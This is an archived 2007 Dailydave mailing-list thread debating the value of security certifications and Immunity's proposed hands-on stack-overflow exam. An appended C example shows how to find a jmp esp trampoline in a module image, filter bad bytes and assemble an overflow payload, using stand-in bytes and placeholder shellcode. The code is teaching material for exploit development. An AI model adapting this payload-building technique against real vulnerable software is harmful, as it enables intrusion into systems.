[Dailydave] Information security certifications diversity and getting lost
Weston, David
dweston at fgm.com
Mon Sep 10 14:54:43 EDT 2007
Dave,
That sounds like a really interesting idea, but wouldn't Win XP SP2 be more realistic? I would want someone at the basic level to at least understand trampolines, as jumping straight to the stack would work on your test but is unrealistic in the real world.
Thanks,
David Weston
FGM, Inc
-----Original Message-----
From: dailydave-bounces at lists.immunitysec.com on behalf of Dave Aitel
Sent: Mon 9/10/2007 6:46 AM
To: dailydave at lists.immunitysec.com
Subject: Re: [Dailydave] Information security certifications diversity and getting lost
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
One thing we've been working on here at Immunity is Network Offense
Professional certifications. Essentially it would be practical tests
that established someone was capable of doing certain actions we
should all be able to do.
For example, the first certification was a simple stack overflow
against Windows 2000. Testees would exploit it using Immunity
Debugger/WinDBG and VisualSploit, which would keep it as technology
agnostic as possible. You can either write a simple Win32 overflow or
you can't.
We were going to launch it during DefCon, but had a few other things
going on. :>
- -dave
J.M. Seitz wrote:
> Hey Mike,
>
>> The CISSP is the undisputed king of information security
>> certifications. Currently, every now and then a security company
>> starts pushing their employees towards certification programs.
>> These are usually known for featuring insanely long exams,
>> absurdly pedantic requirements and other kinds of doubtfully
>> respectable necessities.
>
> I wouldn't say it's the king, I would say it has some very broad
> objectives, but is more so a Security+ on steroids. When the CISSP
> got traction, you have to look at the timing of the certification,
> and the fact that the only other certification that would get you a
> high paying job was a CCIE, and the CCIE is a nasty cert to get to
> say the least. SANS has put out some incredibly strong programs
> that can range from technical (GCIH/GCFA/GREM) to CISSP-like
> certifications.
>
>
>> We all know that there are several other certifications, but
>> CISSP brings, without doubt, the very best. Be it a security
>> operations manager, a field operative or some other kind of
>> consulting freak, a CISSP will always deliver.
>
> I still disagree, and to be honest, I have interviewed more CISSPs
> that couldn't answer questions like "What does PKI stand for?",
> "Give me an analogy of a buffer overflow.", "What is transparent
> proxying and why is it important in some circumstances?". Come on,
> certs are as good as the people who take them, I again disagree.
>
>
>> My question for people out there, is this madness _that_
>> necessary? Do we have a good reason for spending loads of budget
>> on certification programs and wasting our companies' money in
>> such investments?
>
> Yep, again it's a baseline, one for HR. The people to watch out for
> are the ones who go the extra mile; someone who has a GCIH most
> definitely doesn't make me giggle with glee, but someone who has a
> GCIH Gold I look forward to meeting with, and definitely love to
> engage on their research topic. It's worth a company's time and
> money to do it: (a) employees are more loyal to companies that give,
> and (b) you'd be amazed at how often you will apply things straight
> from a certification.
>
>> Employees feel constrained since they might lose the
>> certification after quitting their jobs, surfing towards another
>> employer as intrusive and wasteful as the previous one, etc.
>
> Not sure how you would lose a certification if you left your job?
> Once you write the exam, it's yours not your company's.
>
>> If certifications exist for ethical hackers, are we going to see
>> certifications for unethical hackers anytime soon? What if the
>> mob and shady underground organizations needed to certify that
>> they are employing the very best of the federal prison's Module
>> 5? Will a Certified Unethical Software Security Expert (CUSSE)
>> certification ever exist? "My name is Lincoln Six Echo, Certified
>> Information Insecurity Systems Professional".
>
> http://blog.wired.com/27bstroke6/2007/08/a-look-inside-a.html
>
> There ya go :) I bet one or two unscrupulous people are
> "black-belts" :)
>
> In the end, certifications are good, but the reality is that they
> are only good if you are looking for work, and you get what you put
> into them. You want to get noticed in the security world? Build a
> tool, join and help people on forums, help Sourcefire write
> signatures (they need it), contact George Theall at Tenable and ask
> if you can help write NASL plugins, help the OSVDB with mangling.
> These are all things that will help round out a newcomer, and add
> it to the list of things that can benefit you when it's time to go
> job hunting. Now, if you _really_ want to get noticed, tackle the
> tough problems, write books, and try to talk at Black Hat, etc.
>
> Coming from an unknown security guy, low profile, I am still in the
> phase of doing all of these things. As such I have a Sec+ and a
> GCIH (which I am wrapping up my research paper on), and I can
> honestly say I do use some of it in my day-to-day. You don't see
> these acronyms on my email signature but that's because I am not
> looking for work :)
>
> JS
>
>
>
> _______________________________________________ Dailydave mailing
> list Dailydave at lists.immunitysec.com
> http://lists.immunitysec.com/mailman/listinfo/dailydave
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.6 (GNU/Linux)
iD8DBQFG5Uq/B8JNm+PA+iURAl+CAKDAkJkhJvSNf+lIAtF55A6IotizfgCgtZiP
od5Gzue0h/Q6P4MTq5E7/pM=
=VXSu
-----END PGP SIGNATURE-----
_______________________________________________
Dailydave mailing list
Dailydave at lists.immunitysec.com
http://lists.immunitysec.com/mailman/listinfo/dailydave
-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://lists.immunitysec.com/pipermail/dailydave/attachments/20070910/432e99ef/attachment.htm
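The difference Weston is pointing at, between returning straight into a hard-coded stack address (which a fixed Windows 2000 test target tolerates) and returning through a `jmp esp`-style trampoline in a loaded module (which survives the stack landing at a different address on another box or another run), is shown below as an added example. It is not code from the thread, from Immunity, or from the certification; the "module" bytes, the image base 0x77E10000, and the one-byte int3 "shellcode" are constructed stand-ins, and the bad-byte filter assumes a strcpy-style copy that stops on 0x00. One caveat the thread does not raise: XP SP2 also introduced DEP, and in a process where it is enforced neither a stack jump nor a trampoline into the stack will execute on its own.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Two-byte x86 sequences that transfer control to the address in ESP.
 * After RET pops the overwritten return address, ESP points just past it,
 * i.e. at whatever the attacker placed after the return address. */
struct tramp { const char *name; uint8_t bytes[2]; };
static const struct tramp TRAMPS[] = {
    { "jmp esp",       { 0xFF, 0xE4 } },
    { "call esp",      { 0xFF, 0xD4 } },
    { "push esp; ret", { 0x54, 0xC3 } },
};
#define NTRAMPS (sizeof TRAMPS / sizeof TRAMPS[0])

/* An address is only usable if none of its bytes would stop the vulnerable
 * copy (0x00 for strcpy, 0x0A/0x0D for line-based parsers, and so on). */
int addr_is_usable(uint32_t addr, const uint8_t *bad, size_t nbad)
{
    for (int shift = 0; shift < 32; shift += 8) {
        uint8_t b = (uint8_t)(addr >> shift);
        for (size_t k = 0; k < nbad; k++)
            if (b == bad[k]) return 0;
    }
    return 1;
}

/* Scan a module image loaded at `base` for the first usable trampoline.
 * Returns its absolute address, or 0 if none; *which names the sequence. */
uint32_t find_trampoline(const uint8_t *image, size_t len, uint32_t base,
                         const uint8_t *bad, size_t nbad, const char **which)
{
    for (size_t i = 0; i + 1 < len; i++) {
        for (size_t t = 0; t < NTRAMPS; t++) {
            if (memcmp(image + i, TRAMPS[t].bytes, 2) != 0) continue;
            uint32_t addr = base + (uint32_t)i;
            if (!addr_is_usable(addr, bad, nbad)) continue;
            if (which) *which = TRAMPS[t].name;
            return addr;
        }
    }
    return 0;
}

/* Lay out the overflow: padding up to the saved return address, the
 * trampoline address (little-endian), then the shellcode that ESP will
 * point at once RET has consumed the address. A Win2k-style exploit would
 * put a guessed stack address here instead. Returns bytes written, or 0
 * if the output buffer is too small. */
size_t build_payload(uint8_t *out, size_t outlen, size_t ret_offset,
                     uint32_t ret_addr, const uint8_t *sc, size_t sclen)
{
    size_t total = ret_offset + 4 + sclen;
    if (total > outlen) return 0;
    memset(out, 'A', ret_offset);
    for (int k = 0; k < 4; k++)
        out[ret_offset + k] = (uint8_t)(ret_addr >> (8 * k));
    memcpy(out + ret_offset + 4, sc, sclen);
    return total;
}

/* Constructed stand-in for a loaded module: NOP-filled, with "call esp" at
 * 0x0A and "jmp esp" at 0x121. SAMPLE_BASE is an assumed image base; these
 * are not bytes from any real DLL. The call esp sits at 0x77E1000A, whose
 * second byte is 0x00, so the strcpy filter must reject it. */
#define SAMPLE_BASE 0x77E10000u
#define SAMPLE_LEN  0x130u
static uint8_t sample_module[SAMPLE_LEN];
const uint8_t *sample_module_bytes(void)
{
    memset(sample_module, 0x90, SAMPLE_LEN);
    sample_module[0x0A]  = 0xFF; sample_module[0x0B]  = 0xD4; /* call esp */
    sample_module[0x121] = 0xFF; sample_module[0x122] = 0xE4; /* jmp esp  */
    return sample_module;
}
static const uint8_t NO_NULLS[] = { 0x00 };         /* bad bytes for strcpy */
static const uint8_t SAMPLE_SHELLCODE[] = { 0xCC }; /* int3 placeholder      */
uint8_t payload[128];

int main(void)
{
    const char *which = NULL;
    uint32_t t = find_trampoline(sample_module_bytes(), SAMPLE_LEN, SAMPLE_BASE,
                                 NO_NULLS, 1, &which);
    if (!t) { puts("no usable trampoline"); return 1; }
    printf("using %s at 0x%08x\n", which, t);
    size_t n = build_payload(payload, sizeof payload, 64, t,
                             SAMPLE_SHELLCODE, sizeof SAMPLE_SHELLCODE);
    printf("payload length %zu; return address bytes: %02x %02x %02x %02x\n",
           n, payload[64], payload[65], payload[66], payload[67]);
    return 0;
}
```

With the null filter on, the scan skips the `call esp` at 0x77E1000A and settles on the `jmp esp` at 0x77E10121; with no bad bytes it would take the first hit. On a real target the image bytes come from the module as mapped in the debugger, and the filter list comes from how the vulnerable function actually copies the input.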